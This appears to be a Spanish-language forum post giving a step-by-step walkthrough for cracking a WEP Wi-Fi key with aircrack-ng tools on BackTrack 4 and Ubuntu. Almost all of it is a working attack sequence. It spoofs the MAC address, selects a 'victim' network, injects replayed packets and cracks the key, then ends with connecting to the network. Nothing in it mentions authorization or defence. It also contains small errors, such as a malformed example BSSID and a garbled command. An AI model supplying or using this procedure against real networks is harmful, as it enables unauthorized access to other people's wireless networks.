Hola amigos, este es mi primer post.
Vamos a ver como hackear una clave Wep usando Back Track 4 y Ubuntu , ambas son distros de Gnu/Linux.
Advierto que la guía es rápida, así que deberán tener unos pocos conocimientos de computación, cálculo integral, física cuántica, ingeniería en transmisiones militares, plastilina y un clip. JEJEJE
Es broma, solo saber un poco de computación.
Empezemos!!!!
BACK TRACK 4
1.- Inicia con el CD
2.- User: root
Password: toor
3.- startx
4.- Abre una terminal.
5.- iwconfig
-Selecciona tu dispositivo (Y)
6.- airmon-ng stop Y
7.- ifconfig Y down
8.- macchanger --mac 00:11:22:33:44:55 Y
-El número lo llamaremos MAC
9.- airmon-ng start Y
10.- airodump-ng Y
-Elije victima
-Consigue CH, NoBSSID y ESSID
-Ctrl-C
11.- airodump-ng -c CH -w test --bssid NoBSSID Y
12.- Abre otra terminal.
13.- aireplay-ng -1 0 -a NoBSSID -h MAC -e ESSID Y
14.- Abre otra terminal.
15.- aireplay-ng -3 -b NoBSSID -h MAC Y
16.- Abre otra terminal.
17.- aircrack-ng -n64 *.cap
-Si te dice que ha fallado, repite el paso 17.
-Si repites el paso 17 varias veces y si aún no la da repite solo el paso 13 y
después repites el paso 17. Ojo, repite los pasos en las terminales donde
estaban.
18.- Listo, te mostrara algo como:
KEY DECRYPTED 100% (90:59:05:26:74)
19.- Esa es la clave. Al introducirla quita los puntos.
20.- Cierra todas las terminales y abre solo una.
21.- sudo reboot
Con eso saldremos de BackTrack y podras arrancar con tu OS original.
Ejemplos: CH=5
ESSID=INFINITUM3254
NoBSSID=32:56:U7:E2:43
Y=wlan0
====================================================================
UBUNTU
1.- Tenemos que tener instalados estos programas:
-Mac Changer
-Aircrack-ng
2.- Para instalarlos solo abre una consola y activa usuario ROOT.
-Activalo con sudo su
-Instala con Mac Changer con sudo apt-get install macchanger
-Instala Aircrack-ng con sudo apt-get install aircrack-ng
-OJO: Debemos estar conetactados para instalar eso.
3.- Ahora empezemos el ataque.
4.- iwconfig
-Selecciona tu dispositivo (Y)
5.- airmon-ng stop Y
6.- ifconfig Y down
7.- macchanger --mac 00:11:22:33:44:55 Y
-El número lo llamaremos MAC
8.- airmon-ng start Y
-Talvez, nuestra Y en lugar de ser wlan0 por ejemplo cambie a mon0. De ser
así, ahora en lugar de poner wlan0, poner mon0. Preferible usar mon0.
9.- airodump-ng Y
-Busca redes
-Selecciona víctima
-Consigue CH, NoBSSID y ESSID
-Ctrl-C
10.- airodump-ng -c CH --bssid NoBSSID -w test Y
11.- Abre una terminal y activa ROOT
12.- aireplay-ng -1 0 -e ESSID -a NoBSSID -h MAC Y
13.- Abre otra terminal y activa ROOT
14.- aireplay -ng -3 -b NoBSSID -h MAC Y
15.- Abre otra terminale y activa ROOT
16.- aircrack-ng -z *.cap
-Si te dice que ha fallado, repite el paso 16.
-Si repites el paso 16 varias veces y si aún no la da repite solo el paso 12 y
después repites el paso 16. Ojo, repite los pasos en las terminales donde
estaban.
17.- Listo, te mostrara algo como:
KEY DECRYPTED 100% (90:59:05:26:74)
18.- Esa es la clave. Al introducirla quita los puntos.
20.- Cierra todas las terminales.
21.- Conectate a la red.
Ejemplos: CH=5
ESSID=INFINITUM3254
NoBSSID=32:56:U7:E2:43
Y=wlan0
====================================================================
Listo, hemos terminado.